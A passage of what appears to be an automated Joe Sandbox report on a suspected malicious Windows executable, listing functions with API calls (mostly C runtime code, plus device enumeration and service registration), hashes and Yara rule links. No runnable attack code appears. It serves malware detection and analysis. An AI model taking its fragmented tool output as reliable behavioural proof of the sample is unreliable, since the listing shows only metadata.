                                                • Opcode Fuzzy Hash: ce188016e9b708351dc3f296e14d6de37b35a2fa3b68e1915809a77b59586602
                                                • Instruction Fuzzy Hash: 9821897A900208BFCB46EF98C981DDE7BB5FF08345B014165B9159F132EB35DA998B80
                                                Function 0034B107 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 308COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 0034B202
                                                • type_info::operator==.LIBVCRUNTIME ref: 0034B229
                                                • ___TypeMatch.LIBVCRUNTIME ref: 0034B335
                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 0034B410
                                                • _UnwindNestedFrames.LIBCMT ref: 0034B497
                                                • CallUnexpected.LIBVCRUNTIME ref: 0034B4B2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                • String ID: csm$csm$csm
                                                • API String ID: 2123188842-393685449
                                                • Opcode ID: 7e37a9e04d9ecf83dd62645b7f7b7c2bddb306281e62932d65bc4270a4246c01
                                                • Instruction ID: 3d0c048ad4049020ac65b565f2fce2b908adf7ce2183d95cfa3775c08997109a
                                                • Opcode Fuzzy Hash: 7e37a9e04d9ecf83dd62645b7f7b7c2bddb306281e62932d65bc4270a4246c01
                                                • Instruction Fuzzy Hash: 0FC16971900209AFCF2ADFA5C881AAEFBF5BF14310F05455AE8146F212D775EA61CF92
                                                Function 0035C918 Relevance: 13.8, APIs: 9, Instructions: 301COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 25fac39fde3b19b170e5dae0080521df13007f9c6e9d5fab07abd218e4ba4183
                                                • Instruction ID: 11d0e83fdc8085d4b5ebc6b88f64e3372693a47086b1fc91edc1b066331a0915
                                                • Opcode Fuzzy Hash: 25fac39fde3b19b170e5dae0080521df13007f9c6e9d5fab07abd218e4ba4183
                                                • Instruction Fuzzy Hash: 9EC106709143099FDB07DF98C881FADBBB4AF4A319F105158EC05AB3A2C774994ACB60
                                                Function 00359E9A Relevance: 13.8, APIs: 9, Instructions: 273COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00359B53: CreateFileW.KERNEL32(00000000,00000000,?,00359F43,?,?,00000000,?,00359F43,00000000,0000000C), ref: 00359B70
                                                • GetLastError.KERNEL32 ref: 00359FAE
                                                • __dosmaperr.LIBCMT ref: 00359FB5
                                                • GetFileType.KERNEL32(00000000), ref: 00359FC1
                                                • GetLastError.KERNEL32 ref: 00359FCB
                                                • __dosmaperr.LIBCMT ref: 00359FD4
                                                • CloseHandle.KERNEL32(00000000), ref: 00359FF4
                                                • CloseHandle.KERNEL32(?), ref: 0035A141
                                                • GetLastError.KERNEL32 ref: 0035A173
                                                • __dosmaperr.LIBCMT ref: 0035A17A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                • String ID:
                                                • API String ID: 4237864984-0
                                                • Opcode ID: ccc2697d1f43a7678af43d23f3e26f20e2dd580b8c5d723770c3e32b0b4cdbf3
                                                • Instruction ID: d4be61ce2a6272753d3247e30c33e6c3bca127bafd8ee3793b1a2943ce5615a7
                                                • Opcode Fuzzy Hash: ccc2697d1f43a7678af43d23f3e26f20e2dd580b8c5d723770c3e32b0b4cdbf3
                                                • Instruction Fuzzy Hash: 8AA12532A04545CFCF1ADF68DC51BAD3BB4AB06321F14425EEC12AF2A1D775890AD751
                                                Function 003138D0 Relevance: 13.7, APIs: 9, Instructions: 180memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LocalAlloc.KERNEL32(00000040,0000001C), ref: 0031393A
                                                • SetupDiEnumDeviceInfo.SETUPAPI(?,?,00000000), ref: 00313958
                                                • LocalAlloc.KERNEL32(00000040,0000001C), ref: 00313993
                                                • SetupDiEnumDeviceInterfaces.SETUPAPI(?,00000000,00363210,?,00000000), ref: 003139B8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocDeviceEnumLocalSetup$InfoInterfaces
                                                • String ID:
                                                • API String ID: 1562706109-0
                                                • Opcode ID: 9dda118cd784378ff5dc129ecf27837b1e8542e086fc37b3fe01c31703004dba
                                                • Instruction ID: d5c9afc881b6a9bc7fba56d26a1367ce8a8543e79dd95aa6f09dd7756cd3e5dc
                                                • Opcode Fuzzy Hash: 9dda118cd784378ff5dc129ecf27837b1e8542e086fc37b3fe01c31703004dba
                                                • Instruction Fuzzy Hash: FF71E771E40208EFDB09DF98D895BDEBBB5FF48310F108619F516AB294DB70AA45CB50
                                                Function 0034AAB0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON
                                                Download Yara Rule
                                                APIs
                                                • _ValidateLocalCookies.LIBCMT ref: 0034AAE7
                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 0034AAEF
                                                • _ValidateLocalCookies.LIBCMT ref: 0034AB78
                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 0034ABA3
                                                • _ValidateLocalCookies.LIBCMT ref: 0034ABF8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                • String ID: csm
                                                • API String ID: 1170836740-1018135373
                                                • Opcode ID: a5df99ef82531c0b15d647a172bd92199bf5751e33bbc50a71676f332ee9aadf
                                                • Instruction ID: f8c5483168c48fb082f45dcbf71421b671aeb6a53adcfeb6939cbcf5f8d20049
                                                • Opcode Fuzzy Hash: a5df99ef82531c0b15d647a172bd92199bf5751e33bbc50a71676f332ee9aadf
                                                • Instruction Fuzzy Hash: C841E234A00618ABCF12DF68C884A9EBBF6EF45324F148159E8159F392C771FE45CB92
                                                Function 003549F7 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: api-ms-$ext-ms-
                                                • API String ID: 0-537541572
                                                • Opcode ID: b673d843b99367c92641c8d95fe16643baa023d1c184a0efd15c79a4f0a07069
                                                • Instruction ID: 3f3954b2491132e852679f77223817d350c27cb02f9c9a490d7617fe2e2e036a
                                                • Opcode Fuzzy Hash: b673d843b99367c92641c8d95fe16643baa023d1c184a0efd15c79a4f0a07069
                                                • Instruction Fuzzy Hash: 35210D31EC5221BBCB779B25DC84E5A379C9F417AAF220120EC06A76B0D670DD4887D8
                                                Function 00358B4A Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00358B12: _free.LIBCMT ref: 00358B37
                                                • _free.LIBCMT ref: 00358B98
                                                  • Part of subcall function 003543F6: RtlFreeHeap.NTDLL(00000000,00000000,?,00358B3C,?,00000000,?,?,?,00358B63,?,00000007,?,?,00358F65,?), ref: 0035440C
                                                  • Part of subcall function 003543F6: GetLastError.KERNEL32(?,?,00358B3C,?,00000000,?,?,?,00358B63,?,00000007,?,?,00358F65,?,?), ref: 0035441E
                                                • _free.LIBCMT ref: 00358BA3
                                                • _free.LIBCMT ref: 00358BAE
                                                • _free.LIBCMT ref: 00358C02
                                                • _free.LIBCMT ref: 00358C0D
                                                • _free.LIBCMT ref: 00358C18
                                                • _free.LIBCMT ref: 00358C23
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 69f2b5708e616187e934cedd954eabdd3f6ef88739ed6815fd0e6bcb534e0a1a
                                                • Instruction ID: 29cfdd73913210a15f4a887a6bfeb3943a9812215809fb08e83d1a74dcf4e567
                                                • Opcode Fuzzy Hash: 69f2b5708e616187e934cedd954eabdd3f6ef88739ed6815fd0e6bcb534e0a1a
                                                • Instruction Fuzzy Hash: 86112CB1A41B44BAD932FFB0CC06FCB779C9F04702F404C25BA9B6E072DF69A55A5650
                                                Function 003561CA Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 00356212
                                                • __fassign.LIBCMT ref: 003563F7
                                                • __fassign.LIBCMT ref: 00356414
                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0035645C
                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0035649C
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00356544
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                • String ID:
                                                • API String ID: 1735259414-0
                                                • Opcode ID: dcfcebe560d917ad1a3ed3af5dbc4f34cc88a39a280ec2d59361f43b25636a29
                                                • Instruction ID: 7833584ce0850996de432d2cd9bd11de4a940087440612a8ce80c414581573d7
                                                • Opcode Fuzzy Hash: dcfcebe560d917ad1a3ed3af5dbc4f34cc88a39a280ec2d59361f43b25636a29
                                                • Instruction Fuzzy Hash: E2C1C0B5D002588FCF16CFE8C8819EDBBB9AF09315F68416AE815FB251D630994ACB50
                                                Function 0034ADD0 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetLastError.KERNEL32(?,?,0034ADC7,0034A617,00349E5F), ref: 0034ADDE
                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0034ADEC
                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0034AE05
                                                • SetLastError.KERNEL32(00000000,0034ADC7,0034A617,00349E5F), ref: 0034AE57
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLastValue___vcrt_
                                                • String ID:
                                                • API String ID: 3852720340-0
                                                • Opcode ID: fbfd2576b177e910f747a9b8e2397ab46c704fb9fa204f41a4bfd6486af80a34
                                                • Instruction ID: 1d12ce646ad96d9c67a4f8abcd2cc3c38db17c64f3b9201d69401a13e549004f
                                                • Opcode Fuzzy Hash: fbfd2576b177e910f747a9b8e2397ab46c704fb9fa204f41a4bfd6486af80a34
                                                • Instruction Fuzzy Hash: 89016432A4DB119EA63326B27C82A2726DCEB017B1B210329F5204D0F0FF90AC495505
                                                Function 00327AD0 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 210memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • Concurrency::cancel_current_task.LIBCPMTD ref: 00327BD9
                                                • _Allocate.LIBCONCRTD ref: 00327BE9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateConcurrency::cancel_current_task
                                                • String ID: MM2$MM2$QP1
                                                • API String ID: 806954194-2220108417
                                                • Opcode ID: 5c853863d51c605d0ef6af6e66a130ba16c7c00ed55244406e43554b91c37372
                                                • Instruction ID: c39a2d9da854e1202884ad75f0608cb7eb8fdeba2076314abe6e7bc13fe08ad5
                                                • Opcode Fuzzy Hash: 5c853863d51c605d0ef6af6e66a130ba16c7c00ed55244406e43554b91c37372
                                                • Instruction Fuzzy Hash: 69A192B5E042199FCB18CF98D991AEEBBF5BF88310F208199E509A7355D7306A41CFA4
                                                Function 00357637 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON
                                                Download Yara Rule
                                                Strings
                                                • C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, xrefs: 0035763C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe
                                                • API String ID: 0-1535992457
                                                • Opcode ID: 577ba6acf981bb9ef58053a15ff2981441996f460cc6462da4d887bf584c2ce7
                                                • Instruction ID: 4eee493eace9a960d13e0f7e95216aa9b08191c9164d87a1347f98239e8a3e0a
                                                • Opcode Fuzzy Hash: 577ba6acf981bb9ef58053a15ff2981441996f460cc6462da4d887bf584c2ce7
                                                • Instruction Fuzzy Hash: 2221D47160C606BF9B12AF69AC80D2B77ADEF013667118614FC15DB170EB31DC0A87A0
                                                Function 0034BE77 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • FreeLibrary.KERNEL32(00000000,?,?,?,0034BF38,?,?,0036EED4,00000000,?,0034C063,00000004,InitializeCriticalSectionEx,00363D6C,InitializeCriticalSectionEx,00000000), ref: 0034BF07
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeLibrary
                                                • String ID: api-ms-
                                                • API String ID: 3664257935-2084034818
                                                • Opcode ID: 37865db2e09339010b17f81fdc297c357d8a335c77311b7c4d49bf7df4a82646
                                                • Instruction ID: ce20c8a1c8bbf71fe1dc14ecb52e73c39c09e3806617938b73a13645a0f25613
                                                • Opcode Fuzzy Hash: 37865db2e09339010b17f81fdc297c357d8a335c77311b7c4d49bf7df4a82646
                                                • Instruction Fuzzy Hash: 1E11C635A01221BBDF239B68AC45B99B7D8AF417B0F164110FA05EF280D7B0FE808AD4
                                                Function 00352675 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,0035266A,?,?,00352632,?,?,?), ref: 0035268A
                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0035269D
                                                • FreeLibrary.KERNEL32(00000000,?,?,0035266A,?,?,00352632,?,?,?), ref: 003526C0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: aedb1d5165d1a02c614cdef133fc346e57d6d85a189744a3495f61bc4e6f0481
                                                • Instruction ID: 24dab52e42994be8d051a3a01c030fdf894cf4ae2d3fe65961c1b9cfc1a4bdba
                                                • Opcode Fuzzy Hash: aedb1d5165d1a02c614cdef133fc346e57d6d85a189744a3495f61bc4e6f0481
                                                • Instruction Fuzzy Hash: F7F01231A10218FBDB13AB50DD09B9E7A78EB41756F118064F805A2160CBB08F04DA95
                                                Function 0035D3C4 Relevance: 7.7, APIs: 5, Instructions: 199COMMON
                                                Download Yara Rule
                                                APIs
                                                • __alloca_probe_16.LIBCMT ref: 0035D448
                                                • __alloca_probe_16.LIBCMT ref: 0035D50E
                                                • __freea.LIBCMT ref: 0035D57A
                                                  • Part of subcall function 003548DF: RtlAllocateHeap.NTDLL(00000000,00000000,?,?,0034956E,00000000,?,00311FF9,00000000,?,00311F08), ref: 00354911
                                                • __freea.LIBCMT ref: 0035D583
                                                • __freea.LIBCMT ref: 0035D5A6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.3286192538.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                • Associated: 00000000.00000002.3286147238.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286289686.0000000000363000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286334177.000000000036E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286371153.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286423984.0000000000374000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.3286471868.0000000000375000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_310000_611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                • String ID:
                                                • API String ID: 1423051803-0
                                                • Opcode ID: 90eb3ce1e1011d792c022937826977caed63d11c37349164e47a2b1514de2c96
                                                • Instruction ID: b18891de280763c13701b825288135bf7bc57ed6eef24a0832fe8dc6d9a72eb9
                                                • Opcode Fuzzy Hash: 90eb3ce1e1011d792c022937826977caed63d11c37349164e47a2b1514de2c96
                                                • Instruction Fuzzy Hash: 4651E3B250020AAFDB339F54CC41EBF37A9EF41756F264529FD04AB160EB30DC5986A0
                                                Function 003200D0 Relevance: 7.6, APIs: 5, Instructions: 109registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegisterServiceCtrlHandlerA.ADVAPI32(?,Function_000100B0), ref: 003201FC
                                                • SetServiceStatus.ADVAPI32(00000000,0036F574), ref: 0032022B
                                                • SetServiceStatus.ADVAPI32(00000000,0036F574), ref: 00320254
